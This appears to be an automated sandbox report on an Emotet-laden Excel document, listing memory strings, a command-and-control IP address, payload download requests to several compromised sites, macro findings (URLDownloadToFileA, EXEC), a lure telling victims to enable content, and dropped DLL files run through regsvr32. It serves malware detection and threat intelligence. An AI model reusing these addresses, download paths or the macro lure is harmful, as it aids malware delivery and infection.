Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.1214540474.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982406822.00000000001B6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214540936.0000000000124000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214558959.0000000000256000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme.
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoc
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214649654.0000000000305000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/
Source: regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/E&
Source: regsvr32.exe, 00000006.00000002.1214569548.000000000015A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/d
Source: regsvr32.exe, 00000004.00000002.1214570294.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.982445860.00000000001DE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1214943088.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214621472.0000000000295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/
Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/0
Source: regsvr32.exe, 00000008.00000002.1214675657.000000000030B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/4
Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.co
Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: learnviaonline.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C InternetReadFile, 4_2_0000000180017C8C
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Found malicious Excel 4.0 Macro
Source: Datei_26744565.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Source: Datei_26744565.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: Datei_26744565.xls Initial sample: EXEC
Source: Datei_26744565.xls Initial sample: EXEC
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\RrQZitdNyvCFEhe\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D212B0 3_2_000007FEF9D212B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25E01 3_2_000007FEF9D25E01
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25CAD 3_2_000007FEF9D25CAD
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D26850 3_2_000007FEF9D26850
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2443C 3_2_000007FEF9D2443C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D253FB 3_2_000007FEF9D253FB
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D24A70 3_2_000007FEF9D24A70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_002C0000 3_2_002C0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026410 3_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025C30 3_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001D58 3_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800165E4 3_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011E5C 3_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C6C8 3_2_000000018002C6C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C2C8 3_2_000000018002C2C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026F14 3_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016320 3_2_0000000180016320
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001378 3_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018FE8 3_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001ABE8 3_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800243F4 3_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800083F8 3_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800247FC 3_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001DBFC 3_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001100C 3_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027C28 3_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002143C 3_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001303C 3_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A840 3_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003840 3_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B444 3_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F048 3_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002AC4C 3_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010050 3_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003050 3_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000445C 3_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C85C 3_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003460 3_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029C6C 3_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001586C 3_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000406C 3_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E06C 3_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BC70 3_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001447C 3_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026C80 3_2_0000000180026C80
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C84 3_2_0000000180010C84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016088 3_2_0000000180016088
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180002888 3_2_0000000180002888
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017C8C 3_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FC8C 3_2_000000018000FC8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002D098 3_2_000000018002D098
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800154B8 3_2_00000001800154B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011CCC 3_2_0000000180011CCC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800064D0 3_2_00000001800064D0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800180D4 3_2_00000001800180D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800054D8 3_2_00000001800054D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002CCE0 3_2_000000018002CCE0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800254E4 3_2_00000001800254E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800184E8 3_2_00000001800184E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800010E8 3_2_00000001800010E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E8F0 3_2_000000018000E8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A0F8 3_2_000000018002A0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019900 3_2_0000000180019900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011904 3_2_0000000180011904
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F908 3_2_000000018001F908
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002490C 3_2_000000018002490C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001890C 3_2_000000018001890C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D510 3_2_000000018001D510
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003D18 3_2_0000000180003D18
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002191C 3_2_000000018002191C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D128 3_2_000000018001D128
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D12C 3_2_000000018000D12C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014930 3_2_0000000180014930
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008534 3_2_0000000180008534
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CD44 3_2_000000018001CD44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B948 3_2_000000018000B948
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000796C 3_2_000000018000796C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010590 3_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028D94 3_2_0000000180028D94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800091A8 3_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800171B8 3_2_00000001800171B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018DBC 3_2_0000000180018DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800141C8 3_2_00000001800141C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B1D4 3_2_000000018002B1D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023DDC 3_2_0000000180023DDC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029DF0 3_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015DF4 3_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800011F4 3_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FE08 3_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027E14 3_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B618 3_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023220 3_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020A34 3_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007634 3_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022E38 3_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E638 3_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010250 3_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026A64 3_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180004264 3_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013674 3_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F678 3_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E278 3_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005E7C 3_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025E88 3_2_0000000180025E88
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002868C 3_2_000000018002868C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014E98 3_2_0000000180014E98
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014AA4 3_2_0000000180014AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800126A8 3_2_00000001800126A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800036A8 3_2_00000001800036A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A6BC 3_2_000000018002A6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CABC 3_2_000000018001CABC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000EAC0 3_2_000000018000EAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B6D4 3_2_000000018001B6D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F2DC 3_2_000000018000F2DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800202E0 3_2_00000001800202E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800226E0 3_2_00000001800226E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019AF0 3_2_0000000180019AF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BEF0 3_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012EF8 3_2_0000000180012EF8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029710 3_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017710 3_2_0000000180017710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C740 3_2_000000018000C740
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020F44 3_2_0000000180020F44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023B48 3_2_0000000180023B48
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023748 3_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021754 3_2_0000000180021754
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022358 3_2_0000000180022358
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029F5C 3_2_0000000180029F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B368 3_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001BF70 3_2_000000018001BF70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025374 3_2_0000000180025374
